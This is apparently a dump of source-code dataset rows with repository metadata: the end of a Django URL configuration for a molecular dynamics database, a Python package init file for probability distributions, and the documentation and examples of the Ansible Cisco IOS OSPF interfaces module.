url(r'^moleculereuse/(?:[0-9]+/)open_pubchem/$', views.open_pubchem, name='molecule_open_pubchem_reuse'),
url(r'^moleculereuse/(?:[0-9]+/)open_chembl/$', views.open_chembl, name='molecule_open_chembl_reuse'),
url(r'^molecule/(?P<submission_id>[0-9]+)/submitpost/$', views.submitpost_view, name='submitpost'),
url(r'^molecule/(?P<submission_id>[0-9]+)/generate_properties/$', views.generate_molecule_properties, name='generate_molecule_properties'),
url(r'^molecule/(?P<submission_id>[0-9]+)/get_compound_info_pubchem/$', views.get_compound_info_pubchem, name='get_compound_info_pubchem'),
url(r'^molecule/(?P<submission_id>[0-9]+)/get_compound_info_chembl/$', views.get_compound_info_chembl, name='get_compound_info_chembl'),
url(r'^molecule/open_pubchem/$', views.open_pubchem, name='molecule_open_pubchem'),
url(r'^molecule/open_chembl/$', views.open_chembl, name='molecule_open_chembl'),
url(r'^molecule2/(?P<submission_id>[0-9]+)/$', views.SMALL_MOLECULEview2, name='molecule2'),
url(r'^MOLECULEfilled/(?P<submission_id>[0-9]+)/$', views.SMALL_MOLECULEview, name='MOLECULEfilled'),
url(r'^MOLECULEfilled2/$', views.SMALL_MOLECULEview2, name='MOLECULEfilled2'),
url(r'^model/(?P<submission_id>[0-9]+)/$', views.MODELview, name='model'),
url(r'^(?P<form_type>model|dynamics)/(?P<submission_id>[0-9]+)/check_pdb_molecules/$', views.pdbcheck_molecule, name='pdbcheck_molecule'),
url(r'^(?P<form_type>dynamics)reuse/(?P<submission_id>[0-9]+)/(?:[0-9]+/)?check_pdb_molecules/$', views.pdbcheck_molecule, name='pdbcheck_molecule'), #######
url(r'^(?P<form_type>model|dynamics)/(?P<submission_id>[0-9]+)/get_submission_molecule_info/$', views.get_submission_molecule_info, name='get_submission_molecule_info'),
url(r'^model/(?P<submission_id>[0-9]+)/ajax_pdbchecker/$', views.pdbcheck, name='pdbcheck'),
url(r'^model/(?P<submission_id>[0-9]+)/search_top/$',views.search_top,name='search_top'), #keep this one in a merge
url(r'^model/(?P<submission_id>[0-9]+)/upload_model_pdb/$', views.upload_model_pdb, name='upload_model_pdb'),
url(r'^modelreuse/(?P<submission_id>-?[0-9]+)/(?:[0-9]+/)?$', views.MODELreuseview, name='modelreuse'),
url(r'^proteinreuse/(?P<submission_id>[0-9]+)/(?:[0-9]+/)?$', views.PROTEINreuseview, name='proteinreuse'),
# url(r'^moleculereuse/(?P<submission_id>[0-9]+)/(?P<model_id>[0-9]+)/$', views.SMALL_MOLECULEreuseview, name='moleculereuse'),
# url(r'^modelrow/$', views.MODELrowview, name='modelrow'),
url(r'^modelreuserequest/(?P<model_id>[0-9]+)/$', views.MODELreuseREQUESTview, name='modelreuserequest'),
url(r'^MODELfilled/(?P<submission_id>[0-9]+)/$', views.MODELview, name='MODELfilled'),
#url(r'^ajax_pdbchecker/(?P<submission_id>[0-9]+)/$', views.pdbcheck, name='pdbcheck'),
url(r'^search/$', SearchView(template='/protwis/sites/protwis/dynadb/templates/search/search.html', searchqueryset=sqs, form_class=MainSearchForm),name='haystack_search'),
url(r'^ajaxsearch/',views.ajaxsearcher,name='ajaxsearcher'),
url(r'^empty_search/',views.emptysearcher,name='emptysearcher'),
url(r'^autocomplete/',views.autocomplete,name='autocomplete'),
url(r'^advanced_search/$', views.NiceSearcher,name='NiceSearcher'),
#url(r'^search_top/(?P<submission_id>[0-9]+)/$',views.search_top,name='search_top'),
url(r'^dynamics/(?P<submission_id>[0-9]+)/$', views.DYNAMICSview, name='dynamics'),
url(r'^dynamics/(?P<submission_id>[0-9]+)/(?:[0-9]+/)?upload_files/((?P<trajectory>traj)/)?$', views.upload_dynamics_files, name='dynamics_upload_files'),
url(r'^dynamicsreuse/(?P<submission_id>[0-9]+)/(?:[0-9]+/)?upload_files/((?P<trajectory>traj)/)?$', views.upload_dynamics_files, name='dynamics_upload_files'),
url(r'^dynamics/(?P<submission_id>[0-9]+)/check_trajectories/$', views.check_trajectories, name='dynamics_check_trajectories'),
url(r'^dynamics/do_analysis/$', views.do_analysis, name='do_analysis'),
# url(r'^dynamicsreuse/(?P<submission_id>[0-9]+)/(?P<model_id>[0-9]+)/$', views.DYNAMICSreuseview, name='dynamicsreuse'),
url(r'^dynamicsreuse/(?P<submission_id>[0-9]+)/(?P<model_id>[0-9]+)/$', views.DYNAMICSview, name='dynamicsreuse'),
url(r'^DYNAMICSfilled/(?P<submission_id>[0-9]+)/$', views.DYNAMICSview, name='DYNAMICSfilled'),
#url(r'^form/$', views.get_formup, name='form'),
url(r'^model/carousel/(?P<model_id>[0-9]+)/$', views.carousel_model_components, name='carousel_model_components'),
url(r'^dynamics/carousel/(?P<dynamics_id>[0-9]+)/$', views.carousel_dynamics_components, name='carousel_dynamics_components'),
#url(r'^files/(?P<path>.*)$', 'django.views.static.serve', {'document_root': settings.MEDIA_ROOT,}), #this line shouldnt be here
url(r'^submitted/(?P<submission_id>[0-9]+)/$', views.SUBMITTEDview, name='submitted'),
url(r'^close_submission/(?P<submission_id>[0-9]+)/$', views.close_submission, name='close_submission'),
url(r'^datasets/$', views.datasets, name='datasets'),
url(r'^table/$', views.table, name='table'),
url(r'^blank/$', TemplateView.as_view(template_name="dynadb/blank.html"), name='blank'),]
# url(r'^some_temp/$', views.some_view, name='some_temp')
# url(r'^prueba_varios/$', views.profile_setting, name='PRUEBA_varios'),
if settings.DEBUG:
urlpatterns += patterns('',
url(r'^files/(?P<path>.*)$', 'django.views.static.serve', {
'document_root': settings.MEDIA_ROOT,
}),
url(r'^static/(?P<path>.*)$', 'django.views.static.serve', {
'document_root': settings.STATIC_ROOT,
}),
)
else:
if settings.FILES_NO_LOGIN:
serve_files_func = views.serve_submission_files_no_login
else:
serve_files_func = views.serve_submission_files
urlpatterns += patterns('',
url(r'^files/(?P<obj_folder>[^/\\]+)/(?P<submission_folder>[^/\\]+)/(?P<path>.*)$', serve_files_func, name='serve_submission_files'),
)
| 0 | 0 | 0 |
d4cb5753e8a045ecd7c806eb722ce2b1fd1f670b | 534 | py | Python | ergo/distributions/__init__.py | bmillwood/ergo | 34be736f1979ad7f1f130bb90728270cb58dbfe8 | [
"MIT"
] | 2 | 2020-06-04T17:06:51.000Z | 2021-01-03T04:41:05.000Z | ergo/distributions/__init__.py | bmillwood/ergo | 34be736f1979ad7f1f130bb90728270cb58dbfe8 | [
"MIT"
] | null | null | null | ergo/distributions/__init__.py | bmillwood/ergo | 34be736f1979ad7f1f130bb90728270cb58dbfe8 | [
"MIT"
] | null | null | null | from .base import (
BetaFromHits,
Categorical,
LogNormalFromInterval,
NormalFromInterval,
bernoulli,
beta,
beta_from_hits,
categorical,
flip,
halfnormal,
halfnormal_from_interval,
lognormal,
lognormal_from_interval,
normal,
normal_from_interval,
random_choice,
random_integer,
uniform,
)
from .distribution import Distribution
from .histogram import HistogramDist
from .location_scale_family import Logistic, Normal
from .logistic_mixture import LogisticMixture
| 21.36 | 51 | 0.741573 | from .base import (
BetaFromHits,
Categorical,
LogNormalFromInterval,
NormalFromInterval,
bernoulli,
beta,
beta_from_hits,
categorical,
flip,
halfnormal,
halfnormal_from_interval,
lognormal,
lognormal_from_interval,
normal,
normal_from_interval,
random_choice,
random_integer,
uniform,
)
from .distribution import Distribution
from .histogram import HistogramDist
from .location_scale_family import Logistic, Normal
from .logistic_mixture import LogisticMixture
| 0 | 0 | 0 |
dd87d93ed2081ca8d1584e8406400f689a4774e3 | 34,776 | py | Python | venv/lib/python3.6/site-packages/ansible_collections/cisco/ios/plugins/modules/ios_ospf_interfaces.py | usegalaxy-no/usegalaxy | 75dad095769fe918eb39677f2c887e681a747f3a | [
"MIT"
] | 1 | 2020-01-22T13:11:23.000Z | 2020-01-22T13:11:23.000Z | venv/lib/python3.6/site-packages/ansible_collections/cisco/ios/plugins/modules/ios_ospf_interfaces.py | usegalaxy-no/usegalaxy | 75dad095769fe918eb39677f2c887e681a747f3a | [
"MIT"
] | 12 | 2020-02-21T07:24:52.000Z | 2020-04-14T09:54:32.000Z | venv/lib/python3.6/site-packages/ansible_collections/cisco/ios/plugins/modules/ios_ospf_interfaces.py | usegalaxy-no/usegalaxy | 75dad095769fe918eb39677f2c887e681a747f3a | [
"MIT"
] | null | null | null | #!/usr/bin/python
#
# -*- coding: utf-8 -*-
# Copyright 2020 Red Hat
# GNU General Public License v3.0+
# (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
#############################################
# WARNING #
#############################################
#
# This file is auto generated by the resource
# module builder playbook.
#
# Do not edit this file manually.
#
# Changes to this file will be over written
# by the resource module builder.
#
# Changes should be made in the model used to
# generate this file or in the resource module
# builder template.
#
#############################################
"""
The module file for ios_ospf_interfaces
"""
from __future__ import absolute_import, division, print_function
__metaclass__ = type
DOCUMENTATION = """
module: ios_ospf_interfaces
short_description: OSPF_Interfaces resource module
description: This module configures and manages the Open Shortest Path First (OSPF)
version 2 on IOS platforms.
version_added: 1.0.0
author: Sumit Jaiswal (@justjais)
notes:
- Tested against Cisco IOSv Version 15.2 on VIRL.
- This module works with connection C(network_cli).
See U(https://docs.ansible.com/ansible/latest/network/user_guide/platform_ios.html)
options:
config:
description: A dictionary of OSPF interfaces options.
type: list
elements: dict
suboptions:
name:
description:
- Full name of the interface excluding any logical unit number,
i.e. GigabitEthernet0/1.
type: str
required: true
address_family:
description:
- OSPF interfaces settings on the interfaces in address-family
context.
type: list
elements: dict
suboptions:
afi:
description:
- Address Family Identifier (AFI) for OSPF interfaces settings
on the interfaces.
type: str
choices:
- ipv4
- ipv6
required: true
process:
description: OSPF interfaces process config
type: dict
suboptions:
id:
description:
- Address Family Identifier (AFI) for OSPF interfaces settings
on the interfaces. Please refer vendor documentation of Valid
values.
type: int
area_id:
description:
- OSPF interfaces area ID as a decimal value. Please
refer vendor documentation of Valid values.
- OSPF interfaces area ID in IP address format(e.g.
A.B.C.D)
type: str
secondaries:
description:
- Include or exclude secondary IP addresses.
- Valid only with IPv4 config
type: bool
instance_id:
description:
- Set the OSPF instance based on ID
- Valid only with IPv6 OSPF config
type: int
adjacency:
description: Adjacency staggering
type: bool
authentication:
description: Enable authentication
type: dict
suboptions:
key_chain:
description: Use a key-chain for cryptographic
authentication keys
type: str
message_digest:
description: Use message-digest authentication
type: bool
'null':
description: Use no authentication
type: bool
bfd:
description:
- BFD configuration commands
- Enable/Disable BFD on this interface
type: bool
cost:
description: Interface cost
type: dict
suboptions:
interface_cost:
description: Interface cost or Route cost of this interface
type: int
dynamic_cost:
description:
- Specify dynamic cost options
- Valid only with IPv6 OSPF config
type: dict
suboptions:
default:
description: Specify default link metric value
type: int
hysteresis:
description: Specify hysteresis value for LSA dampening
type: dict
suboptions:
percent:
description: Specify hysteresis percent changed.
Please refer vendor documentation of Valid values.
type: int
threshold:
description: Specify hysteresis threshold value.
Please refer vendor documentation of Valid values.
type: int
weight:
description: Specify weight to be placed on individual
metrics
type: dict
suboptions:
l2_factor:
description:
- Specify weight to be given to L2-factor metric
- Percentage weight of L2-factor metric. Please refer
vendor documentation of Valid values.
type: int
latency:
description:
- Specify weight to be given to latency metric.
- Percentage weight of latency metric. Please refer
vendor documentation of Valid values.
type: int
oc:
description:
- Specify weight to be given to cdr/mdr for oc
- Give 100 percent weightage for current data rate(0
for maxdatarate)
type: bool
resources:
description:
- Specify weight to be given to resources metric
- Percentage weight of resources metric. Please refer
vendor documentation of Valid values.
type: int
throughput:
description:
- Specify weight to be given to throughput metric
- Percentage weight of throughput metric. Please refer
vendor documentation of Valid values.
type: int
database_filter:
description: Filter OSPF LSA during synchronization and flooding
type: bool
dead_interval:
description: Interval after which a neighbor is declared dead
type: dict
suboptions:
time:
description: time in seconds
type: int
minimal:
description:
- Set to 1 second and set multiplier for Hellos
- Number of Hellos sent within 1 second. Please refer
vendor documentation of Valid values.
- Valid only with IP OSPF config
type: int
demand_circuit:
description: OSPF Demand Circuit, enable or disable
the demand circuit'
type: dict
suboptions:
enable:
description: Enable Demand Circuit
type: bool
ignore:
description: Ignore demand circuit auto-negotiation requests
type: bool
disable:
description:
- Disable demand circuit on this interface
- Valid only with IPv6 OSPF config
type: bool
flood_reduction:
description: OSPF Flood Reduction
type: bool
hello_interval:
description:
- Time between HELLO packets
- Please refer vendor documentation of Valid values.
type: int
lls:
description:
- Link-local Signaling (LLS) support
- Valid only with IP OSPF config
type: bool
manet:
description:
- Mobile Adhoc Networking options
- MANET Peering options
- Valid only with IPv6 OSPF config
type: dict
suboptions:
cost:
description: Redundant path cost improvement required to peer
type: dict
suboptions:
percent:
description: Relative incremental path cost.
Please refer vendor documentation of Valid values.
type: int
threshold:
description: Absolute incremental path cost.
Please refer vendor documentation of Valid values.
type: int
link_metrics:
description: Redundant path cost improvement required to peer
type: dict
suboptions:
set:
description: Enable link-metrics
type: bool
cost_threshold:
description: Minimum link cost threshold.
Please refer vendor documentation of Valid values.
type: int
mtu_ignore:
description: Ignores the MTU in DBD packets
type: bool
multi_area:
description:
- Set the OSPF multi-area ID
- Valid only with IP OSPF config
type: dict
suboptions:
id:
description:
- OSPF multi-area ID as a decimal value. Please refer vendor
documentation of Valid values.
- OSPF multi-area ID in IP address format(e.g. A.B.C.D)
type: int
cost:
description: Interface cost
type: int
neighbor:
description:
- OSPF neighbor link-local IPv6 address (X:X:X:X::X)
- Valid only with IPv6 OSPF config
type: dict
suboptions:
address:
description: Neighbor link-local IPv6 address
type: str
cost:
description: OSPF cost for point-to-multipoint neighbor
type: int
database_filter:
description: Filter OSPF LSA during synchronization and flooding for point-to-multipoint neighbor
type: bool
poll_interval:
description: OSPF dead-router polling interval
type: int
priority:
description: OSPF priority of non-broadcast neighbor
type: int
network:
description: Network type
type: dict
suboptions:
broadcast:
description: Specify OSPF broadcast multi-access network
type: bool
manet:
description:
- Specify MANET OSPF interface type
- Valid only with IPv6 OSPF config
type: bool
non_broadcast:
description: Specify OSPF NBMA network
type: bool
point_to_multipoint:
description: Specify OSPF point-to-multipoint network
type: bool
point_to_point:
description: Specify OSPF point-to-point network
type: bool
prefix_suppression:
description: Enable/Disable OSPF prefix suppression
type: bool
priority:
description: Router priority. Please refer vendor documentation
of Valid values.
type: int
resync_timeout:
description: Interval after which adjacency is reset if oob-resync
is not started. Please refer vendor documentation of Valid values.
type: int
retransmit_interval:
description: Time between retransmitting lost link state
advertisements. Please refer vendor documentation of Valid values.
type: int
shutdown:
description: Set OSPF protocol's state to disable under
current interface
type: bool
transmit_delay:
description: Link state transmit delay.
Please refer vendor documentation of Valid values.
type: int
ttl_security:
description:
- TTL security check
- Valid only with IPV4 OSPF config
type: dict
suboptions:
set:
description: Enable TTL Security on all interfaces
type: bool
hops:
description:
- Maximum number of IP hops allowed
- Please refer vendor documentation of Valid values.
type: int
running_config:
description:
- This option is used only with state I(parsed).
- The value of this option should be the output received from the IOS
device by executing the command B(sh running-config | section
^interface).
- The state I(parsed) reads the configuration from C(running_config)
option and transforms it into Ansible structured data as per the
resource module's argspec and the value is then returned in the
I(parsed) key within the result.
type: str
state:
description:
- The state the configuration should be left in
- The states I(rendered), I(gathered) and I(parsed) does not perform any
change on the device.
- The state I(rendered) will transform the configuration in C(config)
option to platform specific CLI commands which will be returned in the
I(rendered) key within the result. For state I(rendered) active
connection to remote host is not required.
- The state I(gathered) will fetch the running configuration from device
and transform it into structured data in the format as per the resource
module argspec and the value is returned in the I(gathered) key within
the result.
- The state I(parsed) reads the configuration from C(running_config)
option and transforms it into JSON format as per the resource module
parameters and the value is returned in the I(parsed) key within the
result. The value of C(running_config) option should be the same format
as the output of command I(show running-config | include ip route|ipv6
route) executed on device. For state I(parsed) active connection to
remote host is not required.
type: str
choices:
- merged
- replaced
- overridden
- deleted
- gathered
- rendered
- parsed
default: merged
"""
EXAMPLES = """
# Using deleted
# Before state:
# -------------
#
# router-ios#sh running-config | section ^interface
# interface GigabitEthernet0/0
# interface GigabitEthernet0/1
# ipv6 ospf 55 area 105
# ipv6 ospf priority 20
# ipv6 ospf transmit-delay 30
# ipv6 ospf adjacency stagger disable
# interface GigabitEthernet0/2
# ip ospf priority 40
# ip ospf adjacency stagger disable
# ip ospf ttl-security hops 50
# ip ospf 10 area 20
# ip ospf cost 30
- name: Delete provided OSPF Interface config
cisco.ios.ios_ospf_interfaces:
config:
- name: GigabitEthernet0/1
state: deleted
# Commands Fired:
# ---------------
#
# "commands": [
# "interface GigabitEthernet0/1",
# "no ipv6 ospf 55 area 105",
# "no ipv6 ospf adjacency stagger disable",
# "no ipv6 ospf priority 20",
# "no ipv6 ospf transmit-delay 30"
# ]
# After state:
# -------------
# router-ios#sh running-config | section ^interface
# interface GigabitEthernet0/0
# interface GigabitEthernet0/1
# interface GigabitEthernet0/2
# ip ospf priority 40
# ip ospf adjacency stagger disable
# ip ospf ttl-security hops 50
# ip ospf 10 area 20
# ip ospf cost 30
# Using deleted without any config passed (NOTE: This will delete all OSPF Interfaces configuration from device)
# Before state:
# -------------
#
# router-ios#sh running-config | section ^interface
# interface GigabitEthernet0/0
# interface GigabitEthernet0/1
# ipv6 ospf 55 area 105
# ipv6 ospf priority 20
# ipv6 ospf transmit-delay 30
# ipv6 ospf adjacency stagger disable
# interface GigabitEthernet0/2
# ip ospf priority 40
# ip ospf adjacency stagger disable
# ip ospf ttl-security hops 50
# ip ospf 10 area 20
# ip ospf cost 30
- name: Delete all OSPF config from interfaces
cisco.ios.ios_ospf_interfaces:
state: deleted
# Commands Fired:
# ---------------
#
# "commands": [
# "interface GigabitEthernet0/2",
# "no ip ospf 10 area 20",
# "no ip ospf adjacency stagger disable",
# "no ip ospf cost 30",
# "no ip ospf priority 40",
# "no ip ospf ttl-security hops 50",
# "interface GigabitEthernet0/1",
# "no ipv6 ospf 55 area 105",
# "no ipv6 ospf adjacency stagger disable",
# "no ipv6 ospf priority 20",
# "no ipv6 ospf transmit-delay 30"
# ]
# After state:
# -------------
# router-ios#sh running-config | section ^interface
# interface GigabitEthernet0/0
# interface GigabitEthernet0/1
# interface GigabitEthernet0/2
# Using merged
# Before state:
# -------------
#
# router-ios#sh running-config | section ^interface
# router-ios#
- name: Merge provided OSPF Interfaces configuration
cisco.ios.ios_ospf_interfaces:
config:
- name: GigabitEthernet0/1
address_family:
- afi: ipv4
process:
id: 10
area_id: 30
adjacency: true
bfd: true
cost:
interface_cost: 5
dead_interval:
time: 5
demand_circuit:
ignore: true
network:
broadcast: true
priority: 25
resync_timeout: 10
shutdown: true
ttl_security:
hops: 50
- afi: ipv6
process:
id: 35
area_id: 45
adjacency: true
database_filter: true
manet:
link_metrics:
cost_threshold: 10
priority: 55
transmit_delay: 45
state: merged
# Commands Fired:
# ---------------
#
# "commands": [
# "interface GigabitEthernet0/1",
# "ip ospf 10 area 30",
# "ip ospf adjacency stagger disable",
# "ip ospf bfd",
# "ip ospf cost 5",
# "ip ospf dead-interval 5",
# "ip ospf demand-circuit ignore",
# "ip ospf network broadcast",
# "ip ospf priority 25",
# "ip ospf resync-timeout 10",
# "ip ospf shutdown",
# "ip ospf ttl-security hops 50",
# "ipv6 ospf 35 area 45",
# "ipv6 ospf adjacency stagger disable",
# "ipv6 ospf database-filter all out",
# "ipv6 ospf manet peering link-metrics 10",
# "ipv6 ospf priority 55",
# "ipv6 ospf transmit-delay 45"
# ]
# After state:
# -------------
#
# router-ios#sh running-config | section ^interface
# interface GigabitEthernet0/0
# interface GigabitEthernet0/1
# ip ospf network broadcast
# ip ospf resync-timeout 10
# ip ospf dead-interval 5
# ip ospf priority 25
# ip ospf demand-circuit ignore
# ip ospf bfd
# ip ospf adjacency stagger disable
# ip ospf ttl-security hops 50
# ip ospf shutdown
# ip ospf 10 area 30
# ip ospf cost 5
# ipv6 ospf 35 area 45
# ipv6 ospf priority 55
# ipv6 ospf transmit-delay 45
# ipv6 ospf database-filter all out
# ipv6 ospf adjacency stagger disable
# ipv6 ospf manet peering link-metrics 10
# interface GigabitEthernet0/2
# Using overridden
# Before state:
# -------------
#
# router-ios#sh running-config | section ^interface
# interface GigabitEthernet0/0
# interface GigabitEthernet0/1
# ip ospf network broadcast
# ip ospf resync-timeout 10
# ip ospf dead-interval 5
# ip ospf priority 25
# ip ospf demand-circuit ignore
# ip ospf bfd
# ip ospf adjacency stagger disable
# ip ospf ttl-security hops 50
# ip ospf shutdown
# ip ospf 10 area 30
# ip ospf cost 5
# ipv6 ospf 35 area 45
# ipv6 ospf priority 55
# ipv6 ospf transmit-delay 45
# ipv6 ospf database-filter all out
# ipv6 ospf adjacency stagger disable
# ipv6 ospf manet peering link-metrics 10
# interface GigabitEthernet0/2
- name: Override provided OSPF Interfaces configuration
cisco.ios.ios_ospf_interfaces:
config:
- name: GigabitEthernet0/1
address_family:
- afi: ipv6
process:
id: 55
area_id: 105
adjacency: true
priority: 20
transmit_delay: 30
- name: GigabitEthernet0/2
address_family:
- afi: ipv4
process:
id: 10
area_id: 20
adjacency: true
cost:
interface_cost: 30
priority: 40
ttl_security:
hops: 50
state: overridden
# Commands Fired:
# ---------------
#
# "commands": [
# "interface GigabitEthernet0/2",
# "ip ospf 10 area 20",
# "ip ospf adjacency stagger disable",
# "ip ospf cost 30",
# "ip ospf priority 40",
# "ip ospf ttl-security hops 50",
# "interface GigabitEthernet0/1",
# "ipv6 ospf 55 area 105",
# "no ipv6 ospf database-filter all out",
# "no ipv6 ospf manet peering link-metrics 10",
# "ipv6 ospf priority 20",
# "ipv6 ospf transmit-delay 30",
# "no ip ospf 10 area 30",
# "no ip ospf adjacency stagger disable",
# "no ip ospf bfd",
# "no ip ospf cost 5",
# "no ip ospf dead-interval 5",
# "no ip ospf demand-circuit ignore",
# "no ip ospf network broadcast",
# "no ip ospf priority 25",
# "no ip ospf resync-timeout 10",
# "no ip ospf shutdown",
# "no ip ospf ttl-security hops 50"
# ]
# After state:
# -------------
#
# router-ios#sh running-config | section ^interface
# interface GigabitEthernet0/0
# interface GigabitEthernet0/1
# ipv6 ospf 55 area 105
# ipv6 ospf priority 20
# ipv6 ospf transmit-delay 30
# ipv6 ospf adjacency stagger disable
# interface GigabitEthernet0/2
# ip ospf priority 40
# ip ospf adjacency stagger disable
# ip ospf ttl-security hops 50
# ip ospf 10 area 20
# ip ospf cost 30
# Using replaced
# Before state:
# -------------
#
# router-ios#sh running-config | section ^interface
# interface GigabitEthernet0/0
# interface GigabitEthernet0/1
# ip ospf network broadcast
# ip ospf resync-timeout 10
# ip ospf dead-interval 5
# ip ospf priority 25
# ip ospf demand-circuit ignore
# ip ospf bfd
# ip ospf adjacency stagger disable
# ip ospf ttl-security hops 50
# ip ospf shutdown
# ip ospf 10 area 30
# ip ospf cost 5
# ipv6 ospf 35 area 45
# ipv6 ospf priority 55
# ipv6 ospf transmit-delay 45
# ipv6 ospf database-filter all out
# ipv6 ospf adjacency stagger disable
# ipv6 ospf manet peering link-metrics 10
# interface GigabitEthernet0/2
- name: Replaced provided OSPF Interfaces configuration
cisco.ios.ios_ospf_interfaces:
config:
- name: GigabitEthernet0/2
address_family:
- afi: ipv6
process:
id: 55
area_id: 105
adjacency: true
priority: 20
transmit_delay: 30
state: replaced
# Commands Fired:
# ---------------
# "commands": [
# "interface GigabitEthernet0/2",
# "ipv6 ospf 55 area 105",
# "ipv6 ospf adjacency stagger disable",
# "ipv6 ospf priority 20",
# "ipv6 ospf transmit-delay 30"
# ]
# After state:
# -------------
# router-ios#sh running-config | section ^interface
# interface GigabitEthernet0/0
# interface GigabitEthernet0/1
# ip ospf network broadcast
# ip ospf resync-timeout 10
# ip ospf dead-interval 5
# ip ospf priority 25
# ip ospf demand-circuit ignore
# ip ospf bfd
# ip ospf adjacency stagger disable
# ip ospf ttl-security hops 50
# ip ospf shutdown
# ip ospf 10 area 30
# ip ospf cost 5
# ipv6 ospf 35 area 45
# ipv6 ospf priority 55
# ipv6 ospf transmit-delay 45
# ipv6 ospf database-filter all out
# ipv6 ospf adjacency stagger disable
# ipv6 ospf manet peering link-metrics 10
# interface GigabitEthernet0/2
# ipv6 ospf 55 area 105
# ipv6 ospf priority 20
# ipv6 ospf transmit-delay 30
# ipv6 ospf adjacency stagger disable
# Using Gathered
# Before state:
# -------------
#
# router-ios#sh running-config | section ^interface
# interface GigabitEthernet0/0
# interface GigabitEthernet0/1
# ip ospf network broadcast
# ip ospf resync-timeout 10
# ip ospf dead-interval 5
# ip ospf priority 25
# ip ospf demand-circuit ignore
# ip ospf bfd
# ip ospf adjacency stagger disable
# ip ospf ttl-security hops 50
# ip ospf shutdown
# ip ospf 10 area 30
# ip ospf cost 5
# ipv6 ospf 35 area 45
# ipv6 ospf priority 55
# ipv6 ospf transmit-delay 45
# ipv6 ospf database-filter all out
# ipv6 ospf adjacency stagger disable
# ipv6 ospf manet peering link-metrics 10
# interface GigabitEthernet0/2
- name: Gather OSPF Interfaces provided configurations
cisco.ios.ios_ospf_interfaces:
config:
state: gathered
# Module Execution Result:
# ------------------------
#
# "gathered": [
# {
# "name": "GigabitEthernet0/2"
# },
# {
# "address_family": [
# {
# "adjacency": true,
# "afi": "ipv4",
# "bfd": true,
# "cost": {
# "interface_cost": 5
# },
# "dead_interval": {
# "time": 5
# },
# "demand_circuit": {
# "ignore": true
# },
# "network": {
# "broadcast": true
# },
# "priority": 25,
# "process": {
# "area_id": "30",
# "id": 10
# },
# "resync_timeout": 10,
# "shutdown": true,
# "ttl_security": {
# "hops": 50
# }
# },
# {
# "adjacency": true,
# "afi": "ipv6",
# "database_filter": true,
# "manet": {
# "link_metrics": {
# "cost_threshold": 10
# }
# },
# "priority": 55,
# "process": {
# "area_id": "45",
# "id": 35
# },
# "transmit_delay": 45
# }
# ],
# "name": "GigabitEthernet0/1"
# },
# {
# "name": "GigabitEthernet0/0"
# }
# ]
# After state:
# ------------
#
# router-ios#sh running-config | section ^interface
# interface GigabitEthernet0/0
# interface GigabitEthernet0/1
# ip ospf network broadcast
# ip ospf resync-timeout 10
# ip ospf dead-interval 5
# ip ospf priority 25
# ip ospf demand-circuit ignore
# ip ospf bfd
# ip ospf adjacency stagger disable
# ip ospf ttl-security hops 50
# ip ospf shutdown
# ip ospf 10 area 30
# ip ospf cost 5
# ipv6 ospf 35 area 45
# ipv6 ospf priority 55
# ipv6 ospf transmit-delay 45
# ipv6 ospf database-filter all out
# ipv6 ospf adjacency stagger disable
# ipv6 ospf manet peering link-metrics 10
# interface GigabitEthernet0/2
# Using Rendered
- name: Render the commands for provided configuration
cisco.ios.ios_ospf_interfaces:
config:
- name: GigabitEthernet0/1
address_family:
- afi: ipv4
process:
id: 10
area_id: 30
adjacency: true
bfd: true
cost:
interface_cost: 5
dead_interval:
time: 5
demand_circuit:
ignore: true
network:
broadcast: true
priority: 25
resync_timeout: 10
shutdown: true
ttl_security:
hops: 50
- afi: ipv6
process:
id: 35
area_id: 45
adjacency: true
database_filter: true
manet:
link_metrics:
cost_threshold: 10
priority: 55
transmit_delay: 45
state: rendered
# Module Execution Result:
# ------------------------
#
# "rendered": [
# "interface GigabitEthernet0/1",
# "ip ospf 10 area 30",
# "ip ospf adjacency stagger disable",
# "ip ospf bfd",
# "ip ospf cost 5",
# "ip ospf dead-interval 5",
# "ip ospf demand-circuit ignore",
# "ip ospf network broadcast",
# "ip ospf priority 25",
# "ip ospf resync-timeout 10",
# "ip ospf shutdown",
# "ip ospf ttl-security hops 50",
# "ipv6 ospf 35 area 45",
# "ipv6 ospf adjacency stagger disable",
# "ipv6 ospf database-filter all out",
# "ipv6 ospf manet peering link-metrics 10",
# "ipv6 ospf priority 55",
# "ipv6 ospf transmit-delay 45"
# ]
# Using Parsed
# File: parsed.cfg
# ----------------
#
# interface GigabitEthernet0/2
# interface GigabitEthernet0/1
# ip ospf network broadcast
# ip ospf resync-timeout 10
# ip ospf dead-interval 5
# ip ospf priority 25
# ip ospf demand-circuit ignore
# ip ospf bfd
# ip ospf adjacency stagger disable
# ip ospf ttl-security hops 50
# ip ospf shutdown
# ip ospf 10 area 30
# ip ospf cost 5
# ipv6 ospf 35 area 45
# ipv6 ospf priority 55
# ipv6 ospf transmit-delay 45
# ipv6 ospf database-filter all out
# ipv6 ospf adjacency stagger disable
# ipv6 ospf manet peering link-metrics 10
# interface GigabitEthernet0/0
- name: Parse the provided configuration with the existing running configuration
cisco.ios.ios_ospf_interfaces:
running_config: "{{ lookup('file', 'parsed.cfg') }}"
state: parsed
# Module Execution Result:
# ------------------------
#
# "parsed": [
# },
# {
# "name": "GigabitEthernet0/2"
# },
# {
# "address_family": [
# {
# "adjacency": true,
# "afi": "ipv4",
# "bfd": true,
# "cost": {
# "interface_cost": 5
# },
# "dead_interval": {
# "time": 5
# },
# "demand_circuit": {
# "ignore": true
# },
# "network": {
# "broadcast": true
# },
# "priority": 25,
# "process": {
# "area_id": "30",
# "id": 10
# },
# "resync_timeout": 10,
# "shutdown": true,
# "ttl_security": {
# "hops": 50
# }
# },
# {
# "adjacency": true,
# "afi": "ipv6",
# "database_filter": true,
# "manet": {
# "link_metrics": {
# "cost_threshold": 10
# }
# },
# "priority": 55,
# "process": {
# "area_id": "45",
# "id": 35
# },
# "transmit_delay": 45
# }
# ],
# "name": "GigabitEthernet0/1"
# },
# {
# "name": "GigabitEthernet0/0"
# }
# ]
"""
RETURN = """
before:
description: The configuration prior to the model invocation.
returned: always
sample: >
The configuration returned will always be in the same format
of the parameters above.
type: dict
after:
description: The resulting configuration model invocation.
returned: when changed
sample: >
The configuration returned will always be in the same format
of the parameters above.
type: dict
commands:
description: The set of commands pushed to the remote device.
returned: always
type: list
sample: ['interface GigabitEthernet0/1', 'ip ospf 10 area 30', 'ip ospf cost 5', 'ip ospf priority 25']
"""
from ansible.module_utils.basic import AnsibleModule
from ansible_collections.cisco.ios.plugins.module_utils.network.ios.argspec.ospf_interfaces.ospf_interfaces import (
